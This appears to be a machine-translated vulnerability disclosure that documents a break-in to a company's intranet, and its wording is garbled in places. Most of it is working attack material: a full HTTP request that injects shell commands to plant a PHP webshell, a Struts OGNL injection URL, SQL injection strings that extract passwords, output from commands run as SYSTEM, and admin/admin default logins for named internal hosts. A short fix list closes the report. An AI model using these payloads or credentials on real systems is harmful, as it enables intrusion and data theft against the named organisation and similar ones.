9 Yang Intranet roaming caused by a Vulnerability (password needs to be filtered)

9 Yang Intranet roaming caused by a Vulnerability (password needs to be filtered)

Fix

Reference:

Http://wooyun.org/bugs/wooyun-2010-0141195 based on previous Vulnerabilities

The account has been filtered out. The password is still not filtered out.


 

POST /ease/App/index.php/Public/dologin HTTP/1.1Host: plmyun.joyoung.comConnection: keep-aliveContent-Length: 108Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://plmyun.joyoung.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: https://plmyun.joyoung.com/ease/App/index.php/Public/loginAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=gbm15fsjqg8gc7s6ovtdm2uqo6account=123&password=123%22%26echo '' >  /var/www/cgi-bin/yo.php%26ifconfig%22&wdsl=adw&__hash__=c800b1c5f9c095e463c5fc8c1e4de4d3_15b9ecc9113266ac29e34a08bf0b87b5

 

You can use the new version of the kitchen knife to support the old version of https NO





Tunnel http reverse tunnel



First access some internal systems
 

#1
 

Mask Region

  
   1.http://**.**.**
  

/Systeminfo? Vendor = CITRIX & licenseTab = & selected =

Admin/admin weak password for virtualization Management
 

#2

Https: // 172.31.1.120/appliance-overview.php

Admin/admin



AVOCENT KVM

Product Features

The MergePoint Unity switch integrates KVM over IP and serial console management technology on a single device. This independence



IT administrators can access and control servers, network devices, and other data centers and branch offices.



Complete remote management of devices
 

 

#3


 

Target: 

 

Mask Region

  
   1.http://**.**.**/
  

ExecuteSQLFileAction. action

Whoami: nt authority \ system
WebPath: C: \ tomcat \ defalut \ webapps \ ROOT
OS. Name: Windows 2003
OS. Version: 5.2
Java. Home: C: \ Program Files \ Java \ jdk1.6.0 _ 17 \ jre
Java. Version: 1.6.0 _ 17
OS. arch: x86
User. Name: SYSTEM
User. Home: C: \ Documents ents and Settings \ Default User
User. Dir: C: \ WINDOWS \ system32
Java. Class. Path: C: \ tomcat \ defalut \ bin \ bootstrap. jar
Java. IO. Tmpdir: C: \ tomcat \ defalut \ temp

#4
 

 

Mask Region

  
   1.http://**.**.**
  

/Jy_admin/security! Login. action? Redirect % 3A % 24% 7B % 23req % 3D

% 23context. get % 28% 27com. opensymphony. xwork2.dispatcher. HttpServletRequest

% 27% 29% 2C % 23a % 3D % 23req. getSession % 28% 29% 2C % 23b % 3D % 23a. getServletContext

% 28% 29% 2C % 23c % 3D % 23b. getRealPath % 28% 2F % 22% 22% 2C % 23 matt % 3D % 23context. get

% 28% 27com. opensymphony. xwork2.dispatcher. HttpServletResponse % 27% 29% 2C

% 23matt. getWriter % 28% 29. println % 28% 23c % 29% 2C % 23matt. getWriter % 28% 29. flush

% 28% 29% 2C % 23matt. getWriter % 28% 29. close % 28% 29% 7D

#5
 

Mask Region

  
   1.http://**.**.**
  

/Default. aspx O & M Information Platform



1 'or '1' = '1 Injection

123456
 

 

 

http://172.31.0.111/Web/Users/login.asp' and 1=convert(int,(select top 1 Password from Users)) -- 'or'1'='1  09126970585

 

 

Solution:

1. Fix command execution at the entrance

2. Fixing common intranet vulnerabilities. SQL Injection struts Command Execution

3. Various device default passwords